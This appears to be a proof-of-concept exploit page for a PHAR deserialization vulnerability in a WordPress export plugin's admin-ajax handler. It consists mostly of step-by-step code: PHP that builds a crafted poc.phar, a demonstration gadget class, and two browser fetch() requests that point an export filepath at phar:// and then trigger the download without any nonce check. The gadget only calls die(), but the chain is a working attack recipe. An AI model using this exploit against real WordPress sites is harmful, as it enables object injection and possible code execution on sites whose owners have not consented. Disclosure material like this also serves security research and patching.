## https://sploitus.com/exploit?id=WPEX-ID:0A08E49D-D34E-4140-A15D-AD64444665A3
1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a `poc.phar` file using the following code, and add it to the root directory of the server:
<?php
class Evil {}
try
{
$pharFile = 'poc.phar';
if (file_exists($pharFile))
{
unlink($pharFile);
}
$phar = new Phar($pharFile);
$phar->startBuffering();
$phar->addFromString( 'test.txt', 'text' );
$phar->setStub( '<?php __HALT_COMPILER(); ?>' );
$phar->setMetadata( new Evil() );
$phar->stopBuffering();
echo "$pharFile successfully created" . PHP_EOL;
}
catch (Exception $e)
{
echo $e->getMessage();
}
3. Add the following code to the server to simulate a gadget:
class Evil {
function __wakeup() {
die('Arbitrary deserialization');
}
}
4. Run the following code in your browser to create a new export as a Super Admin user and note its ID. Notice that no nonce is required. Replace the `/var/www/html` directory if needed.
await fetch("/wp-admin/admin-ajax.php?action=options&page=pmxe-admin-export", {
"credentials": "include",
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "update_previous=0&filepath=phar:///var/www/html/poc.phar/test.txt&export_to=XmlGoogleMerchants",
"mode": "cors",
});
5. Run the following code in your browser, as a Super Admin (again no nonce needed), using the ID of the export created in the previous step, and see that the PHAR deserialization occurs by examining its output.
await fetch("https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php?action=download&page=pmxe-admin-export&google_feed=1&id=ID", {
"credentials": "include",
"headers": {},
"method": "GET",
"mode": "cors",
});